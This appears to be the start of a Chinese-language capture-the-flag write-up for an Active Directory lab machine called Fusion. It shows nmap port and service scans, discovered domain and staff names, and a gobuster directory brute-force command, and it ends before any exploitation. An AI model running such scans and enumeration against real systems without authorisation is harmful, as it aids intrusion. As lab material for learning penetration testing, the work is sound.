Starting Nmap 7.94 ( https://nmap.org ) at 2023-09-20 12:43 CST Nmap scan report for 10.10.2.72 Host is up (0.26s latency). Not shown: 65512 filtered tcp ports (no-response) PORT STATE SERVICE 53/tcp open domain 80/tcp open http 88/tcp open kerberos-sec 135/tcp open msrpc 139/tcp open netbios-ssn 389/tcp open ldap 445/tcp open microsoft-ds 464/tcp open kpasswd5 593/tcp open http-rpc-epmap 636/tcp open ldapssl 3268/tcp open globalcatLDAP 3269/tcp open globalcatLDAPssl 3389/tcp open ms-wbt-server 5985/tcp open wsman 9389/tcp open adws 49667/tcp open unknown 49668/tcp open unknown 49669/tcp open unknown 49670/tcp open unknown 49671/tcp open unknown 49674/tcp open unknown 49690/tcp open unknown 49704/tcp open unknown
Nmap done: 1 IP address (1 host up) scanned in 27.22 seconds
sudo nmap -sT -sV -sC -O -p53,80,88,135,139,389,445,464,593,636,3268,3269,3389,5985,9389,49667,49668,49669,49670,49671,49674,49690,49704 10.10.190.17 [sudo] mikannse 的密码: Starting Nmap 7.94 ( https://nmap.org ) at 2023-09-20 17:26 CST Nmap scan report for 10.10.190.17 Host is up (0.19s latency).
PORT STATE SERVICE VERSION 53/tcp open domain? 80/tcp open http Microsoft IIS httpd 10.0 |_http-title: eBusiness Bootstrap Template | http-methods: |_ Potentially risky methods: TRACE |_http-server-header: Microsoft-IIS/10.0 88/tcp open kerberos-sec Microsoft Windows Kerberos (server time: 2023-09-20 09:27:00Z) 135/tcp open msrpc Microsoft Windows RPC 139/tcp open netbios-ssn Microsoft Windows netbios-ssn 389/tcp open ldap Microsoft Windows Active Directory LDAP (Domain: fusion.corp0., Site: Default-First-Site-Name) 445/tcp open microsoft-ds? 464/tcp open kpasswd5? 593/tcp open ncacn_http Microsoft Windows RPC over HTTP 1.0 636/tcp open tcpwrapped 3268/tcp filtered globalcatLDAP 3269/tcp filtered globalcatLDAPssl 3389/tcp open ms-wbt-server Microsoft Terminal Services |_ssl-date: 2023-09-20T09:30:11+00:00; 0s from scanner time. | ssl-cert: Subject: commonName=Fusion-DC.fusion.corp | Not valid before: 2023-09-19T09:26:39 |_Not valid after: 2024-03-20T09:26:39 | rdp-ntlm-info: | Target_Name: FUSION | NetBIOS_Domain_Name: FUSION | NetBIOS_Computer_Name: FUSION-DC | DNS_Domain_Name: fusion.corp | DNS_Computer_Name: Fusion-DC.fusion.corp | Product_Version: 10.0.17763 |_ System_Time: 2023-09-20T09:29:32+00:00 5985/tcp filtered wsman 9389/tcp filtered adws 49667/tcp filtered unknown 49668/tcp open msrpc Microsoft Windows RPC 49669/tcp open ncacn_http Microsoft Windows RPC over HTTP 1.0 49670/tcp open msrpc Microsoft Windows RPC 49671/tcp filtered unknown 49674/tcp filtered unknown 49690/tcp filtered unknown 49704/tcp filtered unknown Warning: OSScan results may be unreliable because we could not find at least 1 open and 1 closed port Device type: general purpose Running (JUST GUESSING): Microsoft Windows 2019 (89%) Aggressive OS guesses: Microsoft Windows Server 2019 (89%) No exact OS matches for host (test conditions non-ideal). Service Info: Host: FUSION-DC; OS: Windows; CPE: cpe:/o:microsoft:windows
OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ . Nmap done: 1 IP address (1 host up) scanned in 204.01 seconds
找到域名:
fusion.corp
fusion-dc.fusion.corp
添加hosts
Web
访问80端口
找到几个人名
jhon mickel
andrew arnold
lellien linda
john powel
但是SMB无法找到共享。
扫一下目录
gobuster dir -u fusion.corp -w /usr/share/wordlists/seclists/Discovery/Web-Content/directory-list-2.3-medium.txt -x rar,zip,sql,txt,jsp,php,html,bak
